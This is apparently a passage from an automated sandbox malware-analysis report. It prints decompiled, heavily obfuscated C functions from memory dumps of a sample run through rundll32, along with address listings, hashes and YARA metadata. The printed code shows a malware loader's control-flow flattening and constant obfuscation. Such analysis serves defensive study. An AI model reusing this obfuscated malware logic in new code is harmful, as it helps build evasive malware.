                                                                                                                    0x0034090c
                                                                                                                    0x0034090f
                                                                                                                    0x00340912
                                                                                                                    0x0034085f
                                                                                                                    0x00000000
                                                                                                                    0x00340880
                                                                                                                    0x00340882
                                                                                                                    0x003409e7
                                                                                                                    0x003409fa
                                                                                                                    0x00340888
                                                                                                                    0x0034088e
                                                                                                                    0x00000000
                                                                                                                    0x00340894
                                                                                                                    0x003408ae
                                                                                                                    0x003408b3
                                                                                                                    0x0034088e
                                                                                                                    0x00340882
                                                                                                                    0x0034087e
                                                                                                                    0x00340872
                                                                                                                    0x00340a04
                                                                                                                    0x00340a0d
                                                                                                                    0x003409cb
                                                                                                                    0x003409cb
                                                                                                                    0x003409cb
                                                                                                                    0x00000000
                                                                                                                    0x003409d7
                                                                                                                    0x0034085f

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ,
                                                                                                                    • API String ID: 0-2314114710
                                                                                                                    • Opcode ID: 5c1c654f752f3d0bc4d647c7cc749fb50f06e32ac625fc6b584f3f215edbe33a
                                                                                                                    • Instruction ID: 3582d5f2ce6214125900a425a6fa785355ba8daec0490827537dd7ddb94033ae
                                                                                                                    • Opcode Fuzzy Hash: 5c1c654f752f3d0bc4d647c7cc749fb50f06e32ac625fc6b584f3f215edbe33a
                                                                                                                    • Instruction Fuzzy Hash: 63E141726083809FD369CF25D58A50BBBF1FBC4748F60891DF69A8A260C7B1D949CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100134F0 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Iconic
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 110040809-0
                                                                                                                    • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                    • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                    • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                    • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00349EEC Relevance: 1.5, Strings: 1, Instructions: 226COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E00349EEC() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t218;
				void* _t219;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t257;
				void* _t259;
				char _t263;
				void* _t264;
				void* _t266;

				_v64 = 0xd7ee0e;
				_t257 = 0x22;
				_v64 = _v64 / _t257;
				_v64 = _v64 + 0x89a9;
				_t219 = 0;
				_v64 = _v64 ^ 0x0000b335;
				_t259 = 0xb83ebc6;
				_v96 = 0xf5dfb6;
				_v96 = _v96 >> 6;
				_t221 = 0x26;
				_v96 = _v96 / _t221;
				_t222 = 0x2d;
				_v96 = _v96 * 0x58;
				_v96 = _v96 ^ 0x000b9251;
				_v60 = 0xd70e95;
				_v60 = _v60 >> 9;
				_v60 = _v60 + 0xffffe8b9;
				_v60 = _v60 ^ 0x00062b78;
				_v44 = 0xb641ac;
				_v44 = _v44 / _t222;
				_v44 = _v44 ^ 0x0002d028;
				_v52 = 0xbf8457;
				_t223 = 0x5d;
				_v52 = _v52 / _t223;
				_v52 = _v52 | 0xbb7661a2;
				_v52 = _v52 ^ 0xbb710206;
				_v80 = 0x47b11a;
				_v80 = _v80 ^ 0xc2c4229c;
				_t224 = 0x18;
				_v80 = _v80 / _t224;
				_v80 = _v80 + 0xffff1c96;
				_v80 = _v80 ^ 0x08184a4c;
				_v36 = 0x40dca8;
				_v36 = _v36 + 0x3144;
				_v36 = _v36 ^ 0x004d2780;
				_v40 = 0xec5297;
				_v40 = _v40 * 0x45;
				_v40 = _v40 ^ 0x3fbac2f2;
				_v72 = 0x18b121;
				_v72 = _v72 >> 1;
				_v72 = _v72 * 0x1e;
				_v72 = _v72 + 0xfd79;
				_v72 = _v72 ^ 0x0173ec5f;
				_v76 = 0xd8cc67;
				_v76 = _v76 >> 2;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 * 0x23;
				_v76 = _v76 ^ 0x000d42f3;
				_v88 = 0x5f1bd9;
				_v88 = _v88 + 0x89b3;
				_v88 = _v88 ^ 0xee5f73f3;
				_v88 = _v88 ^ 0xfa82a5ad;
				_v88 = _v88 ^ 0x14801a76;
				_v92 = 0x778c42;
				_t225 = 0x6d;
				_v92 = _v92 * 0x69;
				_v92 = _v92 << 0xb;
				_v92 = _v92 | 0xba472be1;
				_v92 = _v92 ^ 0xfe7d7315;
				_v56 = 0x5dd318;
				_v56 = _v56 / _t257;
				_v56 = _v56 << 0xc;
				_v56 = _v56 ^ 0x2c2721c6;
				_v84 = 0xd870dc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 | 0x1345b487;
				_v84 = _v84 * 0x5a;
				_v84 = _v84 ^ 0xc68bf031;
				_v48 = 0x9a419e;
				_v48 = _v48 | 0xfa3afde2;
				_v48 = _v48 ^ 0xfabdbed6;
				_v32 = 0x7a1ab;
				_v32 = _v32 / _t225;
				_v32 = _v32 ^ 0x000f5e95;
				_v68 = 0x67bbab;
				_v68 = _v68 + 0xffffccf8;
				_v68 = _v68 ^ 0x5c1ded32;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x4cb92f41;
				_t263 = _v28;
				_t258 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t266 = _t259 - 0xc23b37f;
						if(_t266 > 0) {
							break;
						}
						if(_t266 == 0) {
							E00348519(_v56, _v84, _v24);
							_t259 = 0xdb1153f;
							continue;
						}
						if(_t259 == 0xab8c2) {
							_t209 =  *0x353e10; // 0x0
							E00338ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
							_t212 =  *0x353e10; // 0x0
							_t234 = _v16;
							_t264 = _t264 + 0xc;
							_t219 = 1;
							_t259 = 0xc23b37f;
							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
							continue;
						}
						if(_t259 == 0x26dca52) {
							_t234 = _v96;
							_t214 = E0033A9CE(_v96, _t263,  &_v28, _v60, _v44);
							_t258 = _t214;
							_t264 = _t264 + 0xc;
							if(_t214 == 0) {
								goto L22;
							}
							_t259 = 0xe747a68;
							continue;
						}
						if(_t259 == 0xa9b692f) {
							_t263 = E0033F899(_t234);
							_t259 = 0x26dca52;
							continue;
						}
						if(_t259 != 0xb83ebc6) {
							goto L21;
						} else {
							_t259 = 0xa9b692f;
							continue;
						}
					}
					if(_t259 == 0xdb1153f) {
						E00334E7D(_v48, _v32, _t258, _v68);
						_t259 = 0xdb3b1d3;
						goto L21;
					}
					if(_t259 == 0xe566670) {
						_t207 = E0034894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
						_t264 = _t264 + 0x10;
						asm("sbb esi, esi");
						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
						goto L1;
					}
					if(_t259 != 0xe747a68) {
						goto L21;
					}
					_t259 = 0xdb1153f;
					if(_v28 > 2) {
						_t218 = E00334346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
						_v24 = _t218;
						_pop(_t234);
						if(_t218 != 0) {
							_t259 = 0xe566670;
						}
					}
					goto L1;
					L21:
				} while (_t259 != 0xdb3b1d3);
				L22:
				return _t219;
			}










































                                                                                                                    0x00349eef
                                                                                                                    0x00349f03
                                                                                                                    0x00349f08
                                                                                                                    0x00349f0e
                                                                                                                    0x00349f16
                                                                                                                    0x00349f18
                                                                                                                    0x00349f20
                                                                                                                    0x00349f25
                                                                                                                    0x00349f2d
                                                                                                                    0x00349f36
                                                                                                                    0x00349f3b
                                                                                                                    0x00349f46
                                                                                                                    0x00349f49
                                                                                                                    0x00349f4d
                                                                                                                    0x00349f55
                                                                                                                    0x00349f5d
                                                                                                                    0x00349f62
                                                                                                                    0x00349f6a
                                                                                                                    0x00349f72
                                                                                                                    0x00349f82
                                                                                                                    0x00349f86
                                                                                                                    0x00349f8e
                                                                                                                    0x00349f9a
                                                                                                                    0x00349f9f
                                                                                                                    0x00349fa5
                                                                                                                    0x00349fad
                                                                                                                    0x00349fb5
                                                                                                                    0x00349fbd
                                                                                                                    0x00349fc9
                                                                                                                    0x00349fcc
                                                                                                                    0x00349fd0
                                                                                                                    0x00349fd8
                                                                                                                    0x00349fe0
                                                                                                                    0x00349fe8
                                                                                                                    0x00349ff0
                                                                                                                    0x00349ff8
                                                                                                                    0x0034a005
                                                                                                                    0x0034a009
                                                                                                                    0x0034a011
                                                                                                                    0x0034a019
                                                                                                                    0x0034a022
                                                                                                                    0x0034a026
                                                                                                                    0x0034a02e
                                                                                                                    0x0034a036
                                                                                                                    0x0034a03e
                                                                                                                    0x0034a043
                                                                                                                    0x0034a04d
                                                                                                                    0x0034a051
                                                                                                                    0x0034a059
                                                                                                                    0x0034a061
                                                                                                                    0x0034a069
                                                                                                                    0x0034a071
                                                                                                                    0x0034a079
                                                                                                                    0x0034a081
                                                                                                                    0x0034a092
                                                                                                                    0x0034a093
                                                                                                                    0x0034a097
                                                                                                                    0x0034a09c
                                                                                                                    0x0034a0a4
                                                                                                                    0x0034a0ac
                                                                                                                    0x0034a0bc
                                                                                                                    0x0034a0c0
                                                                                                                    0x0034a0c5
                                                                                                                    0x0034a0cd
                                                                                                                    0x0034a0d5
                                                                                                                    0x0034a0da
                                                                                                                    0x0034a0e7
                                                                                                                    0x0034a0eb
                                                                                                                    0x0034a0f3
                                                                                                                    0x0034a0fb
                                                                                                                    0x0034a103
                                                                                                                    0x0034a10b
                                                                                                                    0x0034a119
                                                                                                                    0x0034a11d
                                                                                                                    0x0034a125
                                                                                                                    0x0034a12d
                                                                                                                    0x0034a135
                                                                                                                    0x0034a13d
                                                                                                                    0x0034a142
                                                                                                                    0x0034a14a
                                                                                                                    0x0034a14e
                                                                                                                    0x0034a14e
                                                                                                                    0x0034a152
                                                                                                                    0x0034a152
                                                                                                                    0x0034a152
                                                                                                                    0x0034a152
                                                                                                                    0x0034a158
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034a15e
                                                                                                                    0x0034a216
                                                                                                                    0x0034a21c
                                                                                                                    0x00000000
                                                                                                                    0x0034a21c
                                                                                                                    0x0034a16a
                                                                                                                    0x0034a1d5
                                                                                                                    0x0034a1e9
                                                                                                                    0x0034a1ee
                                                                                                                    0x0034a1f5
                                                                                                                    0x0034a1f9
                                                                                                                    0x0034a1fc
                                                                                                                    0x0034a1fd
                                                                                                                    0x0034a202
                                                                                                                    0x00000000
                                                                                                                    0x0034a202
                                                                                                                    0x0034a172
                                                                                                                    0x0034a1af
                                                                                                                    0x0034a1b4
                                                                                                                    0x0034a1b9
                                                                                                                    0x0034a1bb
                                                                                                                    0x0034a1c0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034a1c6
                                                                                                                    0x00000000
                                                                                                                    0x0034a1c6
                                                                                                                    0x0034a17a
                                                                                                                    0x0034a198
                                                                                                                    0x0034a19a
                                                                                                                    0x00000000
                                                                                                                    0x0034a19a
                                                                                                                    0x0034a182
                                                                                                                    0x00000000
                                                                                                                    0x0034a188
                                                                                                                    0x0034a188
                                                                                                                    0x00000000
                                                                                                                    0x0034a188
                                                                                                                    0x0034a182
                                                                                                                    0x0034a22c
                                                                                                                    0x0034a2c6
                                                                                                                    0x0034a2cd
                                                                                                                    0x00000000
                                                                                                                    0x0034a2cd
                                                                                                                    0x0034a238
                                                                                                                    0x0034a29a
                                                                                                                    0x0034a29f
                                                                                                                    0x0034a2a6
                                                                                                                    0x0034a2ae
                                                                                                                    0x00000000
                                                                                                                    0x0034a2ae
                                                                                                                    0x0034a240
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034a24b
                                                                                                                    0x0034a250
                                                                                                                    0x0034a265
                                                                                                                    0x0034a26a
                                                                                                                    0x0034a26f
                                                                                                                    0x0034a272
                                                                                                                    0x0034a278
                                                                                                                    0x0034a278
                                                                                                                    0x0034a272
                                                                                                                    0x00000000
                                                                                                                    0x0034a2d2
                                                                                                                    0x0034a2d2
                                                                                                                    0x0034a2e1
                                                                                                                    0x0034a2e7

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: D1
                                                                                                                    • API String ID: 0-2215811268
                                                                                                                    • Opcode ID: cc0b683ca5d72fc1ae4fb8f00839fbc30f4953fa0d76bd4ededc6f2f3da72f64
                                                                                                                    • Instruction ID: a507dc510ced188470a03b7d3c857e3cffb457fd64e5d8fa0ca348458c9959f9
                                                                                                                    • Opcode Fuzzy Hash: cc0b683ca5d72fc1ae4fb8f00839fbc30f4953fa0d76bd4ededc6f2f3da72f64
                                                                                                                    • Instruction Fuzzy Hash: 63A163729083008FC359CF65C58940BFBE2BBC4358F54892EF5A99B220D7B5DA498F87
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034BB23 Relevance: 1.4, Strings: 1, Instructions: 173COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 86%
                                                                                                                    			E0034BB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t138;
				intOrPtr _t161;
				void* _t162;
				void* _t164;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t185;
				signed int* _t189;

				_t162 = __ecx;
				_push(1);
				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t138);
				_v16 = 0xdfc885;
				_t189 =  &(( &_v76)[8]);
				asm("stosd");
				_t185 = 0;
				_t164 = 0xcc97672;
				asm("stosd");
				asm("stosd");
				_v32 = 0x60c2fa;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x00046f58;
				_v76 = 0xb548f0;
				_v76 = _v76 >> 0xc;
				_t181 = 0xc;
				_v76 = _v76 * 0x3c;
				_v76 = _v76 + 0xffff64d0;
				_v76 = _v76 ^ 0x0001fd54;
				_v52 = 0x15927a;
				_v52 = _v52 / _t181;
				_v52 = _v52 ^ 0x000151ae;
				_v56 = 0xd6ed9;
				_t182 = 0x1a;
				_v56 = _v56 * 0x3f;
				_v56 = _v56 + 0xfffffbb4;
				_v56 = _v56 ^ 0x0345d46e;
				_v64 = 0xba2b53;
				_v64 = _v64 * 0x6d;
				_v64 = _v64 ^ 0x73d6d9cf;
				_v64 = _v64 * 0x31;
				_v64 = _v64 ^ 0x981330b4;
				_v60 = 0x269f8;
				_v60 = _v60 >> 5;
				_v60 = _v60 + 0xffffb859;
				_v60 = _v60 ^ 0xfff00afd;
				_v68 = 0xfd9147;
				_v68 = _v68 ^ 0x8de1643f;
				_v68 = _v68 / _t182;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000df039;
				_v72 = 0x5def36;
				_v72 = _v72 | 0xd620e1c7;
				_v72 = _v72 + 0xd307;
				_t183 = 0x48;
				_v72 = _v72 / _t183;
				_v72 = _v72 ^ 0x02f0e4dc;
				_v24 = 0xf7704c;
				_v24 = _v24 + 0x27dd;
				_v24 = _v24 ^ 0x00ff74b2;
				_v28 = 0x151ed9;
				_v28 = _v28 * 0x48;
				_v28 = _v28 ^ 0x05f046e2;
				_v36 = 0xddc4df;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 | 0x7f83127d;
				_v36 = _v36 ^ 0x7f8e5ab1;
				_v40 = 0x29fd7f;
				_v40 = _v40 >> 7;
				_v40 = _v40 | 0x8d3b2756;
				_v40 = _v40 ^ 0x8d37b79a;
				_v44 = 0x8dc5a8;
				_v44 = _v44 * 0x63;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x036b3557;
				_v48 = 0xd61f7e;
				_v48 = _v48 | 0xd43d52c3;
				_v48 = _v48 + 0xa376;
				_v48 = _v48 ^ 0xd504b7b0;
				_t184 = _v20;
				while(_t164 != 0x2524be6) {
					if(_t164 == 0xcc97672) {
						_t164 = 0xe41debb;
						continue;
					} else {
						if(_t164 == 0xdd773d9) {
							if(E0034D8EC(_v52, _v56,  &_v20, _t184) != 0) {
								_t164 = 0xe01b1ec;
								continue;
							}
						} else {
							if(_t164 == 0xe01b1ec) {
								E00350AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
								_t189 =  &(_t189[0xa]);
								_t164 = 0x2524be6;
								_t185 =  !=  ? 1 : _t185;
								continue;
							} else {
								if(_t164 != 0xe41debb) {
									L13:
									if(_t164 != 0x78a313b) {
										continue;
									}
								} else {
									_t161 = E00333DE2(_t164);
									_t184 = _t161;
									if(_t161 != 0xffffffff) {
										_t164 = 0xdd773d9;
										continue;
									}
								}
							}
						}
					}
					return _t185;
				}
				E00341E67(_v36, _v40, _v44, _v48, _v20);
				_t189 =  &(_t189[3]);
				_t164 = 0x78a313b;
				goto L13;
			}





























                                                                                                                    0x0034bb2c
                                                                                                                    0x0034bb2f
                                                                                                                    0x0034bb30
                                                                                                                    0x0034bb31
                                                                                                                    0x0034bb35
                                                                                                                    0x0034bb39
                                                                                                                    0x0034bb3d
                                                                                                                    0x0034bb41
                                                                                                                    0x0034bb42
                                                                                                                    0x0034bb43
                                                                                                                    0x0034bb48
                                                                                                                    0x0034bb56
                                                                                                                    0x0034bb59
                                                                                                                    0x0034bb5c
                                                                                                                    0x0034bb5e
                                                                                                                    0x0034bb65
                                                                                                                    0x0034bb66
                                                                                                                    0x0034bb67
                                                                                                                    0x0034bb6f
                                                                                                                    0x0034bb74
                                                                                                                    0x0034bb7c
                                                                                                                    0x0034bb84
                                                                                                                    0x0034bb8e
                                                                                                                    0x0034bb91
                                                                                                                    0x0034bb95
                                                                                                                    0x0034bb9d
                                                                                                                    0x0034bba5
                                                                                                                    0x0034bbbd
                                                                                                                    0x0034bbc1
                                                                                                                    0x0034bbc9
                                                                                                                    0x0034bbd6
                                                                                                                    0x0034bbd9
                                                                                                                    0x0034bbdd
                                                                                                                    0x0034bbe5
                                                                                                                    0x0034bbed
                                                                                                                    0x0034bbfa
                                                                                                                    0x0034bbfe
                                                                                                                    0x0034bc0b
                                                                                                                    0x0034bc0f
                                                                                                                    0x0034bc17
                                                                                                                    0x0034bc1f
                                                                                                                    0x0034bc24
                                                                                                                    0x0034bc2c
                                                                                                                    0x0034bc34
                                                                                                                    0x0034bc3c
                                                                                                                    0x0034bc4c
                                                                                                                    0x0034bc50
                                                                                                                    0x0034bc55
                                                                                                                    0x0034bc5d
                                                                                                                    0x0034bc65
                                                                                                                    0x0034bc6d
                                                                                                                    0x0034bc79
                                                                                                                    0x0034bc7c
                                                                                                                    0x0034bc80
                                                                                                                    0x0034bc88
                                                                                                                    0x0034bc90
                                                                                                                    0x0034bc98
                                                                                                                    0x0034bca0
                                                                                                                    0x0034bcad
                                                                                                                    0x0034bcb1
                                                                                                                    0x0034bcb9
                                                                                                                    0x0034bcc1
                                                                                                                    0x0034bcc6
                                                                                                                    0x0034bcce
                                                                                                                    0x0034bcd6
                                                                                                                    0x0034bcde
                                                                                                                    0x0034bce3
                                                                                                                    0x0034bceb
                                                                                                                    0x0034bcf3
                                                                                                                    0x0034bd00
                                                                                                                    0x0034bd04
                                                                                                                    0x0034bd09
                                                                                                                    0x0034bd11
                                                                                                                    0x0034bd19
                                                                                                                    0x0034bd21
                                                                                                                    0x0034bd29
                                                                                                                    0x0034bd31
                                                                                                                    0x0034bd35
                                                                                                                    0x0034bd47
                                                                                                                    0x0034bde6
                                                                                                                    0x00000000
                                                                                                                    0x0034bd4d
                                                                                                                    0x0034bd53
                                                                                                                    0x0034bdda
                                                                                                                    0x0034bddc
                                                                                                                    0x00000000
                                                                                                                    0x0034bddc
                                                                                                                    0x0034bd55
                                                                                                                    0x0034bd5b
                                                                                                                    0x0034bdac
                                                                                                                    0x0034bdb1
                                                                                                                    0x0034bdb4
                                                                                                                    0x0034bdbb
                                                                                                                    0x00000000
                                                                                                                    0x0034bd5d
                                                                                                                    0x0034bd63
                                                                                                                    0x0034be11
                                                                                                                    0x0034be17
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034bd69
                                                                                                                    0x0034bd71
                                                                                                                    0x0034bd76
                                                                                                                    0x0034bd7b
                                                                                                                    0x0034bd81
                                                                                                                    0x00000000
                                                                                                                    0x0034bd81
                                                                                                                    0x0034bd7b
                                                                                                                    0x0034bd63
                                                                                                                    0x0034bd5b
                                                                                                                    0x0034bd53
                                                                                                                    0x0034be26
                                                                                                                    0x0034be26
                                                                                                                    0x0034be04
                                                                                                                    0x0034be09
                                                                                                                    0x0034be0c
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 6]
                                                                                                                    • API String ID: 0-3974934468
                                                                                                                    • Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                    • Instruction ID: e389d8e1f07b4c904c5439f0a2f7f34d57d2486b58a97672796d6c5452907de7
                                                                                                                    • Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                    • Instruction Fuzzy Hash: B2712071508341AFC359CF25C88941BFBE5FBC9758F504A1DF6969A260C372DA498F43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00335361 Relevance: 1.4, Strings: 1, Instructions: 124COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E00335361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				void* __edx;
				void* _t84;
				void* _t104;
				void* _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				void* _t124;
				signed int* _t127;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E003420B9(_t84);
				_v4 = 0x18047d;
				_t127 =  &(( &_v32)[5]);
				_v4 = _v4 >> 0xa;
				_v4 = _v4 ^ 0x000d3248;
				_t124 = 0;
				_v28 = 0x90acd4;
				_t104 = 0x35df4ed;
				_v28 = _v28 >> 5;
				_v28 = _v28 + 0xffff3107;
				_v28 = _v28 | 0xd0f9b279;
				_v28 = _v28 ^ 0xd0f1daef;
				_v8 = 0x9d14b7;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x027823b1;
				_v32 = 0xfd6947;
				_v32 = _v32 + 0xffff03bf;
				_t120 = 0x72;
				_v32 = _v32 / _t120;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00066e44;
				_v16 = 0x111da;
				_v16 = _v16 ^ 0xdd7c73d4;
				_v16 = _v16 | 0x7d37165e;
				_v16 = _v16 ^ 0xfd769a76;
				_v12 = 0x2531de;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xa63e9142;
				_v20 = 0x6e0002;
				_v20 = _v20 >> 0xe;
				_t121 = 0xe;
				_v20 = _v20 / _t121;
				_t122 = 0x3d;
				_v20 = _v20 * 0x64;
				_v20 = _v20 ^ 0x000bef19;
				_v24 = 0xa3fc95;
				_v24 = _v24 + 0xdcd1;
				_v24 = _v24 << 3;
				_v24 = _v24 / _t122;
				_v24 = _v24 ^ 0x0013a2ec;
				while(_t104 != 0x311781) {
					if(_t104 == 0x35df4ed) {
						_push(_t104);
						_push(_t104);
						_t118 = 0x28;
						 *0x353e08 = E00337FF2(_t118);
						_t104 = 0x605992c;
						continue;
					} else {
						if(_t104 == 0x477ef52) {
							E0033924B();
							_t104 = 0x311781;
							continue;
						} else {
							if(_t104 == 0x605992c) {
								if(E00350F33() != 0) {
									_t104 = 0xdb1ba22;
									continue;
								}
							} else {
								if(_t104 != 0xdb1ba22) {
									L13:
									if(_t104 != 0x5723dc8) {
										continue;
									}
								} else {
									_t124 = E0033960D(_v16, _a12, _a8, _v12);
									_t127 =  &(_t127[3]);
									if(_t124 == 0) {
										_t104 = 0x477ef52;
										continue;
									}
								}
							}
						}
					}
					return _t124;
				}
				E00348519(_v20, _v24,  *0x353e08);
				_t104 = 0x5723dc8;
				goto L13;
			}




















                                                                                                                    0x00335368
                                                                                                                    0x0033536c
                                                                                                                    0x00335370
                                                                                                                    0x00335376
                                                                                                                    0x0033537b
                                                                                                                    0x00335383
                                                                                                                    0x00335386
                                                                                                                    0x0033538d
                                                                                                                    0x00335395
                                                                                                                    0x00335397
                                                                                                                    0x0033539f
                                                                                                                    0x003353a4
                                                                                                                    0x003353ae
                                                                                                                    0x003353bb
                                                                                                                    0x003353c3
                                                                                                                    0x003353cb
                                                                                                                    0x003353d3
                                                                                                                    0x003353d8
                                                                                                                    0x003353e0
                                                                                                                    0x003353e8
                                                                                                                    0x003353f6
                                                                                                                    0x003353fb
                                                                                                                    0x00335401
                                                                                                                    0x00335406
                                                                                                                    0x0033540e
                                                                                                                    0x00335416
                                                                                                                    0x0033541e
                                                                                                                    0x00335426
                                                                                                                    0x0033542e
                                                                                                                    0x00335436
                                                                                                                    0x0033543b
                                                                                                                    0x00335443
                                                                                                                    0x0033544b
                                                                                                                    0x00335454
                                                                                                                    0x00335459
                                                                                                                    0x00335464
                                                                                                                    0x00335465
                                                                                                                    0x00335469
                                                                                                                    0x00335471
                                                                                                                    0x00335479
                                                                                                                    0x00335481
                                                                                                                    0x00335491
                                                                                                                    0x00335495
                                                                                                                    0x0033549d
                                                                                                                    0x003354a7
                                                                                                                    0x00335501
                                                                                                                    0x00335502
                                                                                                                    0x00335505
                                                                                                                    0x0033550d
                                                                                                                    0x00335512
                                                                                                                    0x00000000
                                                                                                                    0x003354a9
                                                                                                                    0x003354ab
                                                                                                                    0x003354ec
                                                                                                                    0x003354f1
                                                                                                                    0x00000000
                                                                                                                    0x003354ad
                                                                                                                    0x003354b3
                                                                                                                    0x003354e6
